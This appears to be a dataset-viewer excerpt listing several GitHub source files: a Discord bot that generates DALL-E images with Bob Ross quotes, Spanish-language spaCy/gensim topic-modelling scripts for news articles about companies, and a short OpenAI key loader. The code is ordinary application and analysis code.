date_collected
stringclasses 1
value | repo_name
stringlengths 6
116
| file_name
stringlengths 2
220
| file_contents
stringlengths 13
357k
| prompts
sequence |
---|---|---|---|---|
2024-01-10 | mclazarus/bot_ross | bot_ross.py | import datetime
import asyncio
import aiohttp
import discord
import os
import json
from datetime import datetime
from discord.ext import commands
import openai
import random
import logging
import coloredlogs
import base64
import io
import string
import re
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("bot_ross")
coloredlogs.install(level='INFO', logger=logger, milliseconds=True)
# Load OpenAI API key and Discord bot token from environment variables
openai.api_key = os.environ['OPENAI_API_KEY']
DISCORD_BOT_TOKEN = os.environ['DISCORD_BOT_TOKEN']
# Configuration
LIMIT = int(os.environ.get('API_LIMIT', 100))
DATA_FILE = "data/request_data.json"
intents = discord.Intents.default()
intents.guilds = True
intents.messages = True
intents.presences = True
intents.message_content = True
bot = commands.Bot(command_prefix='&', intents=intents)
start_time = datetime.now()
def load_data():
if os.path.exists(DATA_FILE):
with open(DATA_FILE, 'r') as f:
return json.load(f)
return {}
def save_data(data):
with open(DATA_FILE, 'w') as f:
json.dump(data, f)
def get_current_month():
return datetime.now().strftime("%Y-%m")
@bot.event
async def on_ready():
logger.info(f'{bot.user.name} has connected to Discord!')
@bot.command(name='ping', help='Check for bot liveness and latency. (ms)')
async def ping(ctx):
await ctx.send(f'Pong! {round(bot.latency * 1000)}ms')
@bot.command(name='natpaint', help='Paint a picture based on a prompt. Using the natural style. monthly limit')
async def natpaint(ctx, *, prompt):
logger.info(f"Received request from {ctx.author.name} to paint: {prompt} with natural style")
current_month = get_current_month()
data = load_data()
if current_month not in data:
data[current_month] = 0
if data[current_month] >= LIMIT:
await ctx.send("Monthly limit reached. Please wait until next month to make more paint requests.")
return
quote = get_random_bob_ross_quote()
await ctx.send(f"{quote}")
file_name = await generate_file_name(prompt)
try:
image_b64 = await fetch_image(prompt, "natural")
image_data = base64.b64decode(image_b64)
image_file = io.BytesIO(image_data)
await ctx.send(file=discord.File(image_file, file_name, description=f"{prompt}"))
data = load_data()
if current_month not in data:
data[current_month] = 0
data[current_month] += 1
save_data(data)
await ctx.send(f"Current Monthly requests: {data[current_month]}")
except Exception as e:
await ctx.send(f"No painting for: {prompt}, exception for this request: {e}")
@bot.command(name='paint', help='Paint a picture based on a prompt. monthly limit')
async def paint(ctx, *, prompt):
logger.info(f"Received request from {ctx.author.name} to paint: {prompt}")
current_month = get_current_month()
data = load_data()
if current_month not in data:
data[current_month] = 0
if data[current_month] >= LIMIT:
await ctx.send("Monthly limit reached. Please wait until next month to make more paint requests.")
return
quote = get_random_bob_ross_quote()
await ctx.send(f"{quote}")
file_name = await generate_file_name(prompt)
try:
image_b64 = await fetch_image(prompt)
image_data = base64.b64decode(image_b64)
image_file = io.BytesIO(image_data)
await ctx.send(file=discord.File(image_file, file_name, description=f"{prompt}"))
# reload the data for the increment since we are async
data = load_data()
if current_month not in data:
data[current_month] = 0
data[current_month] += 1
save_data(data)
await ctx.send(f"Current Monthly requests: {data[current_month]}")
except Exception as e:
await ctx.send(f"No painting for: {prompt}, exception for this request: {e}")
async def fetch_image(prompt, style="vivid"):
async with aiohttp.ClientSession() as session:
for _ in range(2):
async with session.post(
"https://api.openai.com/v1/images/generations",
headers={
"Authorization": f"Bearer {openai.api_key}",
"Content-Type": "application/json"
},
json={
"model": "dall-e-3",
"prompt": prompt,
"n": 1,
"size": "1024x1024",
"quality": "hd",
"style": style,
"user": "bot_ross",
"response_format": "b64_json",
},
) as response:
if response.status == 200:
data = await response.json()
logger.info(f"Request: {prompt} Success")
return data["data"][0]["b64_json"]
else:
error_json = await response.json()
if "error" in error_json:
error_message = error_json["error"]["message"]
else:
error_message = await response.text()
if response.status in [429, 500, 503]:
logger.error(f"Request: {prompt} Trying again. Error: {response.status} {error_message}")
await asyncio.sleep(5)
elif response.status == 400:
logger.info(f"Request: {prompt} Safety Violation.")
data = load_data()
if 'safety_trips' not in data:
data['safety_trips'] = 0
data['safety_trips'] += 1
save_data(data)
else:
logger.error(f"Request: {prompt} Error: {response.status}: {error_message}")
raise Exception(f"response: {response.status}: {error_message}")
async def generate_file_name(prompt):
# replace all special characters with _
file_name = re.sub(r'[^0-9a-zA-Z]', '_', prompt)
# limit size of string to 50 characters
file_name = file_name[:50]
# tack on a random bit of data to the end of the file name to avoid collisions
# Define the characters that can be used in the string
characters = string.ascii_letters + string.digits
# Generate a random 6-character string
random_string = ''.join(random.choice(characters) for i in range(6))
file_name = f"{file_name}_{random_string}.png"
return file_name
@bot.command(name='stats', help='Check monthly stats. (limit, requests)')
async def stats(ctx):
current_month = get_current_month()
data = load_data()
if current_month not in data:
data[current_month] = 0
if 'safety_trips' not in data:
data['safety_trips'] = 0
uptime_in_hours = (datetime.now() - start_time).total_seconds() / 3600
await ctx.send(f"Uptime: {uptime_in_hours:.2f} hours\nMonthly limit: {LIMIT}\nMonthly requests: {data[current_month]}\nSafety Violations: {data['safety_trips']}")
def get_random_bob_ross_quote():
quotes = [
"We don't make mistakes, just happy little accidents.",
"Talent is a pursued interest. Anything that you're willing to practice, you can do.",
"There's nothing wrong with having a tree as a friend.",
"You too can paint almighty pictures.",
"In painting, you have unlimited power.",
"I like to beat the brush.",
"You can do anything you want to do. This is your world.",
"The secret to doing anything is believing that you can do it.",
"No pressure. Just relax and watch it happen.",
"All you need to paint is a few tools, a little instruction, and a vision in your mind.",
"Just let go — and fall like a little waterfall.",
"Every day is a good day when you paint.",
"The more you do it, the better it works.",
"Find freedom on this canvas.",
"It's life. It's interesting. It's fun.",
"Believe that you can do it because you can do it.",
"You can move mountains, rivers, trees — anything you want.",
"You can put as many or as few highlights in your world as you want.",
"The more you practice, the better you get.",
"This is your creation — and it's just as unique and special as you are."
]
return random.choice(quotes)
bot.run(DISCORD_BOT_TOKEN)
| [] |
2024-01-10 | sicard6/ACNCustomerAnalysis | Medios_Comunicacion~NLP_Analitycs~Scripts~NLP.py | # %%
# Librerías
from gensim.corpora.dictionary import Dictionary
from gensim.models import CoherenceModel
from gensim.models import LdaMulticore
import pandas as pd
import spacy
import nltk
import json
import os
# %% Funciones
def procesamiento(columna: str, df: pd.DataFrame):
"""Función para procesar el texto y obtener columnas tokenizada y radicalizada
Args:
columna (str): columna a procesar
df (pd.DataFrame): dataframe en donde se encuentra el texto a procesar
Returns:
pd.DataFrame: Data Frame con columna procesada
"""
# Modelo de spacy que se utilizará
# spacy.cli.download('es_core_news_md')
es = spacy.load('es_core_news_md')
# Etiquetas a remover del texto lematizado
removal = ['ADV', 'PRON', 'CCONJ', 'PUNCT',
'PART', 'DET', 'ADP', 'SPACE', 'NUM', 'SYM']
# Convertir a objeto spaCy
aux = df[columna].str.lower().apply(es)
# Tokenización
df[f'{columna} procesado'] = aux.apply(
lambda x: [token for token in x])
# Normalización (minuscula, tamaño > 3 y solo letras)
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: [token for token in x if len(token) > 3 and token.is_alpha])
# Remover stopwords (combinación de contexto y spacy).
# Convertir Token a str
with open('/Users/'+os.getlogin()+'/OneDrive - Accenture/ACNCustomerAnalysis/NLP_Analitycs/Scripts/sw_es.txt', 'r', encoding='utf-8') as file:
stop_words_contexto = {line.split(None, 1)[0] for line in file}
es.Defaults.stop_words |= stop_words_contexto
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: [token for token in x if not token.is_stop])
# Segmentación en oraciones
df[f'{columna} segmentado'] = aux.apply(
lambda x: ", ".join([segment.orth_ for segment in x.sents]))
# Extracción de entidades
df[f'Entidades de {columna}'] = aux.apply(
lambda x: ", ".join([ent.text for ent in x.ents]))
# Radicalización (stemming)
stemmer = nltk.SnowballStemmer('spanish')
df[f'{columna} radicalizado'] = df[f'{columna} procesado'].apply(
lambda x: ", ".join([stemmer.stem(token.orth_) for token in x]))
# Lemmatization
df[f'{columna} lematizado'] = df[f'{columna} procesado'].apply(
lambda x: ", ".join([token.lemma_ for token in x if token.pos_ not in removal]))
# Procesado a string
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: ", ".join([token.orth_ for token in x]))
def lista_ngramas(val_ent: str, val_pal: str, indice: int, n: int):
"""Función que genera la lista de todas las palabras del conjunto
de datos con la frecuencia de cada una por artículo,
especifica a que artículo pertenece y si es una entidad (1) o no
(0).
Args:
val_ent (str): cadena de entidades obtenida en el procesamiento
val_pal (str): cadena de palabras obtenida en el procesamiento
indice (int): indice del artículo al que corresponden las cadenas
n (int): tamaño de la subsecuencia del n-grama
Returns:
pd.DataFrame: DataFrame con el indice, la palabra, frecuencia de
aparición, ID del artículo al que pertenece. Si es solo una palabra
se incluye la columna de entidad que indica si lo es o no
"""
# Verificar si existen entidades
if type(val_ent) == float:
entidades = {}
else:
entidades = set(val_ent.split(', '))
palabras = val_pal.split(', ')
ngrams = list(nltk.ngrams(palabras, n))
freq_pal = dict(nltk.FreqDist(ngrams))
if n == 1:
lista = []
for key, value in freq_pal.items():
word = ", ".join(list(key))
if word in entidades:
lista.append([word, value, indice, 1])
else:
lista.append([word, value, indice, 0])
df_frec = pd.DataFrame(
lista, columns=['Palabra', 'Frecuencia', 'ID_Articulo', 'Entidad'])
else:
lista = []
for key, value in freq_pal.items():
lista.append([", ".join(list(key)), value, indice])
df_frec = pd.DataFrame(
lista, columns=['Palabra', 'Frecuencia', 'ID_Articulo'])
df_frec.index.name = 'ID_Token'
return df_frec
def asignar_industrias(df: pd.DataFrame):
"""Función para asignar las industrias a cada artículo según de la empresa
de la que se esta hablando
Args:
df (pd.DataFrame): DataFrame a asignarle la columna Industria
"""
with open('/Users/'+os.getlogin()+'/OneDrive - Accenture/ACNCustomerAnalysis/Web_Scraping/config.json', encoding='utf-8-sig') as f:
data = json.load(f)
dic_ind = {}
for i in data['industrias']:
for j in i['Empresas']:
dic_ind[j] = i['industria']
df['Industria'] = df['Empresa'].apply(lambda x: dic_ind[x])
# %% LECTURA Y PREPARACIÓN DE LOS DATOS
path = 'C:/Users/'+os.getlogin() + \
'/OneDrive - Accenture/ACNCustomerAnalysis/Medios_Comunicacion'
# LEER ARCHIVOS CON DATOS
df_raw = pd.read_csv(path+'/data/raw/database.csv',
encoding='utf-8-sig', index_col=[0])
df_curated = pd.read_csv(
path+'/data/curated/curated_database.csv', encoding='utf-8-sig', index_col=[0])
# Verificar cuales articulos no han sido procesados
df = df_raw[~df_raw['Titulo'].isin(df_curated['Titulo'])]
# %%
if len(df) > 0:
# Estandarización formato fechas
df['Contenido'] = df['Contenido'].str.replace(
'\r|\n|\f|\v', ' ')
df['Titulo'] = df['Titulo'].str.replace('\r|\n|\f|\v', ' ')
df['Resumen'] = df['Resumen'].str.replace('\r|\n|\f|\v', ' ')
df['Autor'] = df['Autor'].str.replace('\r|\n|\f|\v', ' ')
df['Fecha Publicacion'] = pd.to_datetime(
df['Fecha Publicacion']).dt.strftime('%d-%m-%Y')
df['Fecha Extraccion'] = pd.to_datetime(
df['Fecha Extraccion']).dt.strftime('%d-%m-%Y')
# ELIMINACIÓN COLUMNAS Y FILAS NO RELEVANTES
# Eliminar filas sin información en la columna Contenido
df = df.drop(df[df['Contenido'] == "SIN PARRAFOS"].index).reset_index(
drop=True)
df = df.drop(df[df['Contenido'].isna()].index).reset_index(drop=True)
df = df.drop(df[df.Contenido.str.len() < 500].index).reset_index(drop=True)
# Eliminar aquellos artículos que no tengan la empresa en su contenido y reemplazar los bigramas
empresas = df['Empresa'].unique()
no_cont = []
for emp in empresas:
df_empresa = df[df['Empresa'] == emp]
df_empresa['Contenido'] = df_empresa['Contenido'].str.lower()
if emp == 'Grupo Exito':
# Guardar aquellos que no contengan a la empresa en su contenido
emp = 'Éxito'
no_cont += df_empresa[~df_empresa['Contenido']
.str.contains(emp.lower())].index.to_list()
# Reemplazar el espacio _ para considerar el bigrama
df['Contenido'] = df['Contenido'].str.replace(
'Grupo Éxito', 'Grupo_Exito')
df['Contenido'] = df['Contenido'].str.replace(
'Éxito', 'Grupo_Exito')
elif ' ' in emp:
# Guardar aquellos que no contengan a la empresa en su contenido
aux = emp.split()[1]
no_cont += df_empresa[~df_empresa['Contenido']
.str.contains(aux.lower())].index.to_list()
# Reemplazar el espacio _ para considerar el bigrama
df['Contenido'] = df['Contenido'].str.replace(
emp, emp.replace(' ', '_'))
df['Contenido'] = df['Contenido'].str.replace(
aux, emp.replace(' ', '_'))
else:
# Guardar aquellos que no contengan a la empresa en su contenido
no_cont += df_empresa[~df_empresa['Contenido']
.str.contains(emp.lower())].index.to_list()
df = df.drop(no_cont).reset_index(drop=True)
# %%
procesamiento('Contenido', df)
df_palabras = pd.DataFrame()
df_bigramas = pd.DataFrame()
df_trigramas = pd.DataFrame()
len_df = len(df)
len_curated = len(df_curated)
for i in range(len_curated, len_curated + len_df):
aux_palabras = lista_ngramas(df.loc[i - len_curated, 'Entidades de Contenido'],
df.loc[i - len_curated, 'Contenido procesado'], i, 1)
df_palabras = pd.concat([df_palabras, aux_palabras], ignore_index=True)
aux_bigramas = lista_ngramas(df.loc[i - len_curated, 'Entidades de Contenido'],
df.loc[i - len_curated, 'Contenido procesado'], i, 2)
df_bigramas = pd.concat([df_bigramas, aux_bigramas], ignore_index=True)
aux_trigramas = lista_ngramas(df.loc[i - len_curated, 'Entidades de Contenido'],
df.loc[i - len_curated, 'Contenido procesado'], i, 3)
df_trigramas = pd.concat([df_trigramas, aux_trigramas], ignore_index=True)
df_curated = pd.concat([df_curated, df], ignore_index=True)
# Eliminar Aquellos con titulos repetidos
df_curated = df_curated[~df_curated['Titulo'].duplicated()
].reset_index(drop=True)
df_curated = df_curated[~df_curated['Fecha Publicacion'].isna()].reset_index(
drop=True)
df_curated.index.name = 'ID_Articulo'
df_curated.to_csv(path+'/data/curated/curated_database.csv',
encoding='utf-8-sig')
palabras_csv = pd.read_csv(
path+'/data/curated/palabras.csv', encoding='utf-8-sig', index_col=[0])
df_palabras = pd.concat([palabras_csv, df_palabras], ignore_index=True)
df_palabras.to_csv(path+'/data/curated/palabras.csv', encoding='utf-8-sig')
bigramas_csv = pd.read_csv(
path+'/data/curated/bigramas.csv', encoding='utf-8-sig', index_col=[0])
df_bigramas = pd.concat([bigramas_csv, df_bigramas], ignore_index=True)
df_bigramas.to_csv(path+'/data/curated/bigramas.csv', encoding='utf-8-sig')
trigramas_csv = pd.read_csv(
path+'/data/curated/trigramas.csv', encoding='utf-8-sig', index_col=[0])
df_trigramas = pd.concat([trigramas_csv, df_trigramas], ignore_index=True)
df_trigramas.to_csv(path+'/data/curated/trigramas.csv', encoding='utf-8-sig')
# topicos(df_curated, 'Contenido')
# %%
| [] |
2024-01-10 | sicard6/ACNCustomerAnalysis | Medios_Comunicacion~NLP_Analitycs~Legacy_Code~NLP.py | #In[]:
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
import spacy
import pyLDAvis.gensim_models
pyLDAvis.enable_notebook()# Visualise inside a notebook
import es_dep_news_trf
from gensim.corpora.dictionary import Dictionary
from gensim.models import LdaMulticore
from gensim.models import CoherenceModel
semanaRaw=pd.read_csv(r'C:\Users\nicolas.gomez.garzon\OneDrive - Accenture\Desktop\NLP\ACNCustomerAnalysis\data\raw\semana.csv')
print(semanaRaw.info())
semanaRaw=semanaRaw[semanaRaw['Empresa']=='Ecopetrol']
print(semanaRaw)
#In[]:
# Our spaCy model:
nlp = es_dep_news_trf.load()
removal= ['ADV','PRON','CCONJ','PUNCT','PART','DET','ADP','SPACE', 'NUM', 'SYM']
tokens = []
for summary in nlp.pipe(semanaRaw['Resumen']):
proj_tok = [token.lemma_.lower() for token in summary if token.pos_ not in removal and not token.is_stop and token.is_alpha]
tokens.append(proj_tok)
semanaRaw['tokens'] = tokens
print(semanaRaw['tokens'])
#In[]:
dictionary = Dictionary(semanaRaw['tokens'])
dictionary.filter_extremes(no_below=1, no_above=0.7, keep_n=1000)
print(dictionary.values())
#In[]:
corpus = [dictionary.doc2bow(doc) for doc in semanaRaw['tokens']]
#In[]:
lda_model = LdaMulticore(corpus=corpus, id2word=dictionary, iterations=50, num_topics=3, workers = 4, passes=10)
#In[]:
topics = []
score = []
for i in range(1,20,1):
lda_model = LdaMulticore(corpus=corpus, id2word=dictionary, iterations=10, num_topics=i, workers = 4, passes=10, random_state=100)
cm = CoherenceModel(model=lda_model, texts = semanaRaw['tokens'], corpus=corpus, dictionary=dictionary, coherence='c_v')
topics.append(i)
score.append(cm.get_coherence())
_=plt.plot(topics, score)
_=plt.xlabel('Number of Topics')
_=plt.ylabel('Coherence Score')
plt.show()
#In[]:
lda_model = LdaMulticore(corpus=corpus, id2word=dictionary, iterations=100, num_topics=5, workers = 4, passes=100)
#In[]:
lda_model.print_topics(-1)
#In[]:
lda_display = pyLDAvis.gensim_models.prepare(lda_model, corpus, dictionary)
pyLDAvis.display(lda_display)
# %%
| [] |
2024-01-10 | sicard6/ACNCustomerAnalysis | Medios_Comunicacion~NLP_Analitycs~Scripts~Topicos.py | # Librerías
import os
import spacy
import nltk
import pyLDAvis.gensim_models
import pyLDAvis
from gensim.models import CoherenceModel
from gensim.models import LdaMulticore
# from gensim.models.ldamodel import LdaModel
from gensim.corpora.dictionary import Dictionary
import pandas as pd
import sys
# %%
# INCLUIR BIGRAMAS Y TRIGRAMAS EN EL DICCIONARIO PARA LOS TÓPICOS
base_path = os.getcwd()
path_medios = os.path.join(base_path, "Medios_Comunicacion")
# Importar documento a procesar
df = pd.read_csv(os.path.join(path_medios, "data", "curated", "curated_database.csv"),
encoding='utf-8-sig', index_col=[0])
# Hasta el momento la única columna procesada ha sido el Contenido
columna = 'Contenido'
# columna = sys[1]
# Filtro de bigramas de estructuras de tipo sustantivo
def bigram_filter(bigram):
"""Función para identificar si alguna palabra del bigrama es un sustantivo
Args:
bigram: Token etiquetado con su categoría gramatical
Returns:
bool: True si es un sustantivo
"""
tag = nltk.pos_tag(bigram)
if tag[0][1] not in ['JJ', 'NN'] and tag[1][1] not in ['NN']:
return False
if 'n' in bigram or 't' in bigram:
return False
if 'PRON' in bigram:
return False
return True
# Filtro de trigramas de estructuras de tipo sustantivo
def trigram_filter(trigram):
"""Función para identificar si alguna palabra del trigrama es un los sustantivos
Args:
bigram: Token etiquetado con su categoría gramatical
Returns:
bool: True si es un sustantivo
"""
tag = nltk.pos_tag(trigram)
if tag[0][1] not in ['JJ', 'NN'] and tag[1][1] not in ['JJ', 'NN']:
return False
if 'n' in trigram or 't' in trigram:
return False
if 'PRON' in trigram:
return False
return True
def replace_ngram(x, trigrams, bigrams):
"""FUnción para reemplazar las palabras por los bigramas o trigramas
Args:
x (str): String a ser reemplazado
Returns:
str: String con la modificación del bigrama o trigrama
"""
for gram in trigrams:
x = x.replace(gram, '_'.join(gram.split()))
for gram in bigrams:
x = x.replace(gram, '_'.join(gram.split()))
return x
def procesamiento(columna: str, df: pd.DataFrame):
"""Función para procesar el texto y obtener columnas tokenizada y radicalizada
Args:
columna (str): columna a procesar
df (pd.DataFrame): dataframe en donde se encuentra el texto a procesar
Returns:
pd.DataFrame: Data Frame con columna procesada
"""
# Modelo de spacy que se utilizará
# spacy.cli.download('es_core_news_md')
es = spacy.load('es_core_news_md')
# Etiquetas a remover del texto lematizado
# Tags I want to remove from the text
removal = ['ADV', 'PRON', 'CCONJ', 'PUNCT',
'PART', 'DET', 'ADP', 'SPACE', 'NUM', 'SYM']
# Convertir a objeto spaCy
aux = df[columna].str.lower().apply(es)
# Tokenización
df[f'{columna} procesado'] = aux.apply(
lambda x: [token for token in x])
# Normalización (minuscula, tamaño > 3 y solo letras)
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: [token for token in x if len(token) > 3 and token.is_alpha])
# Remover stopwords (combinación de contexto y spacy).
# Convertir Token a str
with open(os.path.join(path_medios, "NLP_Analitycs", "Scripts", "sw_es.txt"), 'r', encoding='utf-8') as file:
stop_words_contexto = {line.split(None, 1)[0] for line in file}
es.Defaults.stop_words |= stop_words_contexto
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: [token for token in x if not token.is_stop])
# Segmentación en oraciones
df[f'{columna} segmentado'] = aux.apply(
lambda x: ", ".join([segment.orth_ for segment in x.sents]))
# Extracción de entidades
df[f'Entidades de {columna}'] = aux.apply(
lambda x: ", ".join([ent.text for ent in x.ents]))
# Radicalización (stemming)
stemmer = nltk.SnowballStemmer('spanish')
df[f'{columna} radicalizado'] = df[f'{columna} procesado'].apply(
lambda x: ", ".join([stemmer.stem(token.orth_) for token in x]))
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: [token.text for token in x])
def procesamiento_ngrams(df: pd.DataFrame = df, columna: str = 'Contenido'):
df[f'{columna} lematizado'] = df[f'{columna} lematizado'].apply(
lambda x: x.replace('[', '').replace(']', '').replace('\'', '').split(', '))
df[f'{columna} procesado'] = df[f'{columna} procesado'].apply(
lambda x: x.replace('[', '').replace(']', '').replace('\'', '').split(', '))
dictionary = Dictionary(df[f'{columna} lematizado'])
# Filtrar los tokens de baja y alta frecuencia. Limitar el vocabulario
# a un máximo de 100 palabras
dictionary.filter_extremes(no_below=5, no_above=0.5)
# Contar el número de ocurrencias de cada palabra única
corpus = [dictionary.doc2bow(doc) for doc in df[f'{columna} lematizado']]
bigram_measure = nltk.collocations.BigramAssocMeasures()
finder = nltk.collocations.BigramCollocationFinder\
.from_documents(df[f'{columna} procesado'])
# Filtrar aquellos que ocurren al menos 50 veces
finder.apply_freq_filter(50)
bigram_scores = finder.score_ngrams(bigram_measure.pmi)
trigram_measure = nltk.collocations.TrigramAssocMeasures()
finder = nltk.collocations.TrigramCollocationFinder\
.from_documents(df[f'{columna} procesado'])
# Filtrar aquellos que ocurren al menos 50 veces
finder.apply_freq_filter(50)
trigram_scores = finder.score_ngrams(trigram_measure.pmi)
bigram_pmi = pd.DataFrame(bigram_scores)
bigram_pmi.columns = ['bigram', 'pmi']
bigram_pmi.sort_values(by='pmi', axis=0, ascending=False, inplace=True)
trigram_pmi = pd.DataFrame(trigram_scores)
trigram_pmi.columns = ['trigram', 'pmi']
trigram_pmi.sort_values(by='pmi', axis=0, ascending=False, inplace=True)
# Elija los 500 mejores ngramas, en este caso clasificados por PMI, que tengan estructuras similares a sustantivos.
filtered_bigram = bigram_pmi[bigram_pmi.apply(lambda bigram:
bigram_filter(
bigram['bigram'])
and bigram.pmi > 5, axis=1)][:500]
filtered_trigram = trigram_pmi[trigram_pmi.apply(lambda trigram:
trigram_filter(
trigram['trigram'])
and trigram.pmi > 5, axis=1)][:500]
bigrams = [' '.join(x) for x in filtered_bigram.bigram.values if len(
x[0]) > 2 or len(x[1]) > 2]
trigrams = [' '.join(x) for x in filtered_trigram.trigram.values if len(
x[0]) > 2 or len(x[1]) > 2 and len(x[2]) > 2]
reviews_w_ngrams = df.copy()
reviews_w_ngrams['Contenido'] = reviews_w_ngrams['Contenido'].apply(
lambda x: replace_ngram(x, trigrams, bigrams))
procesamiento('Contenido', reviews_w_ngrams)
reviews_w_ngrams.index.name = 'ID_Articulo'
return reviews_w_ngrams
# %%
# EXTRAER Y ASIGNAR TÓPICOS POR CLIENTES
def mejor_puntaje(topicos: list, puntaje_v: list):
"""Función para obtener el mejor puntaje según el criterio definido:
valor mas a la izquierda que sea >= 0.9 veces el puntaje máximo.
Solo se consideran entre 2 y 12 topicos para que se mantenga interpretable
el resultado
Args:
topicos (list): lista de enteros entre 2 y 12
puntaje_v (list): puntaje correspondiente al número de tópicos
Returns:
int: entero que indica el número de tópicos a considerar.
"""
puntaje_max = max(puntaje_v)
for n in range(len(puntaje_v)):
if puntaje_v[n] >= puntaje_max*(0.9):
break
return topicos[n]
def n_topicos(df: pd.DataFrame, columna: str, corpus: list, diccionario: Dictionary, n_iterations: int = 10, n_workers: int = 4, n_passes: int = 10, n_random_state: int = 47, max_topicos: int = 12, min_topicos: int = 2):
"""Función para obter los puntajes de coherencia para cada uno de los números de tópicos considerados (entre 2 y 12).
Args:
df (pd.DataFrame): data frame donde se encuentran los textos a analizar
columna (str): columna en donde se encuentran los textos
corpus (list): vector con el id de la palabra y el número de ocurrencias
diccionario (Dictionary): colección de palabras de valores únicos de los diferentes textos considerados mapeado con su id
n_iterations (int, optional): número de iteraciones. Por defecto 10.
n_workers (int, optional): equivale al número de cores del computador. Por defecto 4.
n_passes (int, optional): número de veces que pasa por el corpus para entrenarse. Por defecto 10.
n_random_state (int, optional): semilla para un generador de números pseudoaleatorios. Por defecto 47.
max_topicos (int, optional): número máximo de tópicos a considerar. Por defecto 12.
min_topicos (int, optional): número mínimo de tópicos a considerar. Por defecto 2.
Returns:
int: número de tópicos a considerar en el modelo LDA
"""
topicos = []
# puntaje_umass = []
puntaje_v = []
for i in range(min_topicos, max_topicos + 1, 1):
lda_model = LdaMulticore(corpus=corpus, id2word=diccionario, iterations=n_iterations,
num_topics=i, workers=n_workers, passes=n_passes, random_state=n_random_state)
# lda_model = LdaModel(corpus=corpus, id2word=diccionario, iterations=n_iterations,
# num_topics=i, passes=n_passes, random_state=n_random_state)
# cm_umass = CoherenceModel(model=lda_model, corpus=corpus, dictionary=diccionario, coherence='u_mass')
cm_v = CoherenceModel(
model=lda_model, texts=df[f'{columna} lematizado'], corpus=corpus, dictionary=diccionario, coherence='c_v')
topicos.append(i)
# puntaje_umass.append(cm_umass.get_coherence())
puntaje_v.append(cm_v.get_coherence())
n = mejor_puntaje(topicos, puntaje_v)
return n
def modelo_lda(df: pd.DataFrame, columna: str, filtro_inf: int = 1, filtro_sup: float = 0.5, iteraciones: int = 50, workers: int = 4, passes: int = 10, n_palabras: int = None, n_random_state: int = 47):
"""Creación y ejecución del modelo LDA para la definición de tópicos y asignación de los mismos a los artículos
Args:
df (pd.DataFrame): dataframe que contiene los textos ya lematizados
columna (str): columna de la que se obtendrán los tópicos
filtro_inf (int, optional): número mínimo de apariciones de una palabra para ser considerada. Por defecto 1.
filtro_sup (float, optional): proporción máxima de artíulos en los que puede aparecer una palabra. Por defecto 0.2.
iteraciones (int, optional): número de iteraciones. Por defecto 50.
workers (int, optional): equivale al número de cores del computador. Por defecto 4.
passes (int, optional): número de veces que pasa por el corpus para entrenarse. Por defecto 10.
n_palabras (int, optional): número máximo de palabras a considerar en el diccionario. Por defecto None.
n_random_state (int, optional): semilla para un generador de números pseudoaleatorios. Por defecto 47.
Returns:
list, pd.DataFrame: lista de los tópicos y sus palabras correspondientes. Clasificación de los artículos por tema
"""
# El limite inferior se establece en 1 puesto que hay empresas con pocos artículos (2 en el caso de AES chivor)
# df[f'{columna} lematizado'] = df[f'{columna} lematizado'].apply(lambda x: x.replace('[', '').replace(']', '').replace('\'', '').split(','))
diccionario = Dictionary(df[f'{columna} lematizado'])
# diccionario.filter_extremes(no_below=filtro_inf, no_above=filtro_sup, keep_n=n_palabras)
corpus = [diccionario.doc2bow(doc) for doc in df[f'{columna} lematizado']]
n = n_topicos(df=df, columna=columna, corpus=corpus,
diccionario=diccionario)
lda_model = LdaMulticore(corpus=corpus, id2word=diccionario,
iterations=iteraciones, num_topics=n, workers=workers, passes=passes)
# lda_model = LdaModel(corpus=corpus, id2word=diccionario, iterations=iteraciones,
# num_topics=n, passes=passes, random_state=n_random_state)
topic_data = pyLDAvis.gensim_models.prepare(
lda_model, corpus, diccionario, mds='pcoa')
topicos = []
num_terms = 10 # Ajustar el número de palabras para representar cada tema
lambd = 0.6 # Ajústelo según el ajuste anterior
# Obtener las palabras que representa cada tópico
# Ajustar esto para reflejar el número de temas elegidos para el modelo LDA final
for i in range(1, n+1):
topic = topic_data.topic_info[topic_data.topic_info.Category ==
'Topic'+str(i)].copy()
topic['relevance'] = topic['loglift']*(1-lambd)+topic['logprob']*lambd
topicos.append([i, (", ".join(topic.sort_values(
by='relevance', ascending=False).Term[:num_terms].values))])
df['ID_Topico'] = [sorted(lda_model[corpus][text])[0][0]
for text in range(len(df[columna]))]
return topicos, df[['ID_Articulo', 'ID_Topico']]
def main():
reviews_w_ngrams = procesamiento_ngrams()
print('Corrio los ngramas')
# Guardar las palabras correspondientes a cada tópico
# y el tópico al que corresponde a cada artículo
topicos_general = {}
empresa_topicos = {}
empresas = reviews_w_ngrams['Empresa'].unique()
count = 0
for empresa in empresas:
df_aux = reviews_w_ngrams[reviews_w_ngrams['Empresa']
== empresa].reset_index()
topicos_general[empresa], empresa_topicos[empresa] = modelo_lda(
df=df_aux, columna='Contenido')
count += 1
print(count)
# Ajustar los números de los tópicos de 0 a n
for i in topicos_general.keys():
min_val = min(empresa_topicos[i]['ID_Topico'].unique())
if min_val > 1:
empresa_topicos[i]['ID_Topico'] = empresa_topicos[i]['ID_Topico'] - min_val + 1
# Ajustar los tópicos para que no se repitan entre empresas, dado que se
# obtienen individualmente
count = 0
topicos_mod = []
df_topicos = pd.DataFrame()
for i in topicos_general.keys():
aux = empresa_topicos[i].copy()
aux['ID_Topico'] = aux['ID_Topico'] + count
df_topicos = pd.concat([df_topicos, aux], ignore_index=True)
for j in topicos_general[i]:
topicos_mod.append([j[0] + count, j[1]])
count += len(topicos_general[i])
df_dict_topicos = pd.DataFrame(
topicos_mod, columns=['ID_Topico', 'Topico'])
df_topicos = df_topicos.set_index('ID_Articulo')
df_dict_topicos = df_dict_topicos.set_index('ID_Topico')
df_topicos.to_csv(os.path.join(path_medios, "data",
"curated" "topicos.csv"), encoding='utf-8-sig')
df_dict_topicos.to_csv(
os.path.join(path_medios, "data", "curated" "topicos.csv"), encoding='utf-8-sig')
if __name__ == '__main__':
# freeze_support()
print('entro al main')
main()
print('corrio el main')
| [] |
2024-01-10 | life-Nd/RecipeCrawler | my_openai.py | import openai
from api_keys import ApiKeys
openai.api_key = ApiKeys.openai_api_key
